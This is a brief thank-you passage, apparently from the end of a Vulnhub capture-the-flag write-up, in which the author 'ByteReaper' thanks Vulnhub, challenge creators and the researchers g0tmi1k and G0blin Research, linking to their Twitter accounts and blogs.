I would personally like to thank Vulnhub for hosting, and all of the developers that create these challenges. Without you in my life...well...I would be very bored. I would also like to give a shout out to <a href="https://twitter.com/g0tmi1k" target="_blank">@g0tmi1k</a> - <a href="https://blog.g0tmi1k.com/" target="_blank">Blog</a>, <a href="https://twitter.com/g0blinResearch" target="_blank">@G0blinResearch</a> - <a href="https://research.g0blin.co.uk/" target="_blank">Blog</a>, and all the others that I do not have the time to list. If it were not for you researchers I would not be progressing the way I am.<br />
<br />
<br />
Thank you, keep the lulz coming.
<br />
ByteReaper
<br />